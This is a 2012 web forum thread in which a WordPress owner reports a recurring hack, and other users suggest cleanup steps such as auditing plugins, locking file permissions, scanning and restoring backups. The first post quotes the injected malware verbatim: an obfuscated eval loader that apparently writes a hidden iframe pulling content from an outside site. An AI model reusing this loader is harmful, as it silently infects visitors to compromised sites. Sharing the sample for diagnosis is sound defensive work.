1. Advertising
    y u no do it?

    Advertising (learn more)

    Advertise virtually anything here, with CPM banner ads, CPM email ads and CPC contextual links. You can target relevant areas of the site and show ads based on geographical location of the user if you wish.

    Starts at just $1 per CPM or $0.10 per CPC.

Wordpress hacked

Discussion in 'Content Management' started by AliMadkour, Mar 27, 2012.

  1. #1
    Hello..
    please my Wordpress blog hack and that code 's in above:
    <script>c=2;i=c-2;if(parseInt("0123")===83)if(window.document)try{new String("asd").prototype.q}catch(egewgsd){f=['-29i-29i67i64i-6i2i62i73i61i79i71i63i72i78i8i65i63i78i31i70i63i71i63i72i78i77i28i83i46i59i65i40i59i71i63i2i1i60i73i62i83i1i3i53i10i55i3i85i-25i-29i-29i-29i67i64i76i59i71i63i76i2i3i21i-25i-29i-29i87i-6i63i70i77i63i-6i85i-25i-29i-29i-29i62i73i61i79i71i63i72i78i8i81i76i67i78i63i2i-4i22i67i64i76i59i71i63i-6i77i76i61i23i1i66i78i78i74i20i9i9i66i80i70i66i64i80i77i8i63i78i73i81i72i77i8i72i63i78i9i62i9i14i10i14i8i74i66i74i25i65i73i23i11i1i-6i81i67i62i78i66i23i1i11i10i1i-6i66i63i67i65i66i78i23i1i11i10i1i-6i77i78i83i70i63i23i1i80i67i77i67i60i67i70i67i78i83i20i66i67i62i62i63i72i21i74i73i77i67i78i67i73i72i20i59i60i77i73i70i79i78i63i21i70i63i64i78i20i10i21i78i73i74i20i10i21i1i24i22i9i67i64i76i59i71i63i24i-4i3i21i-25i-29i-29i87i-25i-29i-29i64i79i72i61i78i67i73i72i-6i67i64i76i59i71i63i76i2i3i85i-25i-29i-29i-29i80i59i76i-6i64i-6i23i-6i62i73i61i79i71i63i72i78i8i61i76i63i59i78i63i31i70i63i71i63i72i78i2i1i67i64i76i59i71i63i1i3i21i64i8i77i63i78i27i78i78i76i67i60i79i78i63i2i1i77i76i61i1i6i1i66i78i78i74i20i9i9i66i80i70i66i64i80i77i8i63i78i73i81i72i77i8i72i63i78i9i62i9i14i10i14i8i74i66i74i25i65i73i23i11i1i3i21i64i8i77i78i83i70i63i8i80i67i77i67i60i67i70i67i78i83i23i1i66i67i62i62i63i72i1i21i64i8i77i78i83i70i63i8i74i73i77i67i78i67i73i72i23i1i59i60i77i73i70i79i78i63i1i21i64i8i77i78i83i70i63i8i70i63i64i78i23i1i10i1i21i64i8i77i78i83i70i63i8i78i73i74i23i1i10i1i21i64i8i77i63i78i27i78i78i76i67i60i79i78i63i2i1i81i67i62i78i66i1i6i1i11i10i1i3i21i64i8i77i63i78i27i78i78i76i67i60i79i78i63i2i1i66i63i67i65i66i78i1i6i1i11i10i1i3i21i-25i-29i-29i-29i62i73i61i79i71i63i72i78i8i65i63i78i31i70i63i71i63i72i78i77i28i83i46i59i65i40i59i71i63i2i1i60i73i62i83i1i3i53i10i55i8i59i74i74i63i72i62i29i66i67i70i62i2i64i3i21i-25i-29i-29i87'][0].split('i');md='a';v="eval";}if(v)e=window[v];w=f;s=[];r=String;for(;589!=i;i+=1){j=i;s+=r["fromCharCode"](38+1*w[j]);}
    if(f)z=s;e(z);</script>
    HTML:
    when i remove the code its back again
    all files at the same user hacked
    any advice ?
    thanks
     
    AliMadkour, Mar 27, 2012 IP
  2. snowelephant

    snowelephant Peon

    Messages:
    31
    Likes Received:
    1
    Best Answers:
    1
    Trophy Points:
    0
    #2
    It's hard to tell without a little more information. Since it comes back immediately, it's likely code adding it, rather than another user who has access to your site. You might want to look at what plugins you installed and try disabling them until the issue goes away - particularly anything you downloaded straight from Google, rather than the official WP plugin site.
     
    snowelephant, Apr 7, 2012 IP
  3. denisjames

    denisjames Peon

    Messages:
    46
    Likes Received:
    0
    Best Answers:
    0
    Trophy Points:
    0
    #3
    Check up the plugins you installed, it happend to me before because one of the plugins i used
     
    denisjames, Apr 7, 2012 IP
  4. chinasa

    chinasa Peon

    Messages:
    1,974
    Likes Received:
    2
    Best Answers:
    0
    Trophy Points:
    0
    #4
    I have never had a problem of my wordpress being hacked so i don't think i can help.
     
    chinasa, Apr 8, 2012 IP
  5. cynthiablue

    cynthiablue Peon

    Messages:
    1
    Likes Received:
    0
    Best Answers:
    0
    Trophy Points:
    0
    #5
    I am having this happen to me, too. I've been trying to change file permissions to the index.php files to 444, and the .htaccess files too. I've found a couple of plugins that help, Bullet Proof Security, helps secure the .htaccess files and recommends permissions for various other files. So far, it's holding. I also use Exploit Scanner which identifies which files the eval code has been inserted into. I think it's been 24 hours and no new hacks... I'm watching them pretty closely.

    I don't know where this is coming from, but it's super annoying. I have changed users and passwords on all the logins and DB users. But my database seems fine, actually. It's just the php files that are getting hacked with the eval code.
     
    cynthiablue, Apr 8, 2012 IP
  6. red_satan

    red_satan Active Member

    Messages:
    220
    Likes Received:
    3
    Best Answers:
    0
    Trophy Points:
    78
    #6
    Scan your plugins and themes. If it back again contact your hosting support. Hope it helps.
     
    red_satan, Apr 17, 2012 IP
  7. mbitsol

    mbitsol Guest

    Messages:
    101
    Likes Received:
    0
    Best Answers:
    0
    Trophy Points:
    0
    #7
    Do you have a backup of your blog ?
     
    mbitsol, Apr 22, 2012 IP